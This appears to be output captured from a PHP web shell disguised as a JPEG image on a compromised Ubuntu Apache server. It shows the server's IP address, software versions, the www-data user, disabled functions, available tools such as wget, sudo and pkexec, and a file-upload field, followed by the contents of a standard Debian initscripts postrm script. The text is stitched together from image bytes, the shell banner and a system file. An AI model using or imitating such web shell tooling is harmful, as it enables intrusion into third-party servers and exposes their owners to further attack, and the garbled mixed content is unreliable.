????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.221 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/lib/dpkg/info_silent/ |
Upload File : |
#! /bin/sh # # initscripts postrm # set -e case "$1" in purge) # # Remove abandoned conffiles # rm -f /etc/init.d/bootclean rm -f /etc/init.d/bootclean.dpkg-old rm -f /etc/init.d/bootclean.sh rm -f /etc/init.d/bootclean.sh.dpkg-old rm -f /etc/default/bootlogd rm -f /etc/default/bootlogd.dpkg-old # # Remove configuration files # rm -f \ /etc/default/rcS \ /etc/nologin \ /etc/motd.tail \ /etc/motd.static # # Remove state files # rm -f /var/lib/initscripts/nologin # # Remove run time state files # rm -f /var/run/motd # # Remove log files # rm -f \ /var/log/dmesg \ /var/log/boot \ /var/log/fsck/checkroot \ /var/log/fsck/checkfs # Remove rc symlinks in the reverse dependency order they were # inserted update-rc.d rc.local remove >/dev/null || exit $? update-rc.d single remove >/dev/null || exit $? update-rc.d killprocs remove >/dev/null || exit $? update-rc.d sendsigs remove >/dev/null || exit $? update-rc.d umountnfs.sh remove >/dev/null || exit $? update-rc.d umountfs remove >/dev/null || exit $? update-rc.d umountroot remove >/dev/null || exit $? update-rc.d reboot remove >/dev/null || exit $? update-rc.d halt remove >/dev/null || exit $? update-rc.d urandom remove >/dev/null || exit $? # Remove /dev/pts and /dev/shm ? ;; esac # Automatically added by dh_installdeb dpkg-maintscript-helper rm_conffile /etc/init.d/stop-bootlogd 2.88dsf-41ubuntu1 initscripts -- "$@" # End automatically added section # Automatically added by dh_installdeb dpkg-maintscript-helper rm_conffile /etc/init.d/stop-bootlogd-single 2.88dsf-41ubuntu1 initscripts -- "$@" # End automatically added section # Automatically added by dh_installdeb dpkg-maintscript-helper rm_conffile /etc/init.d/bootlogd 2.88dsf-41ubuntu1 initscripts -- "$@" # End automatically added section :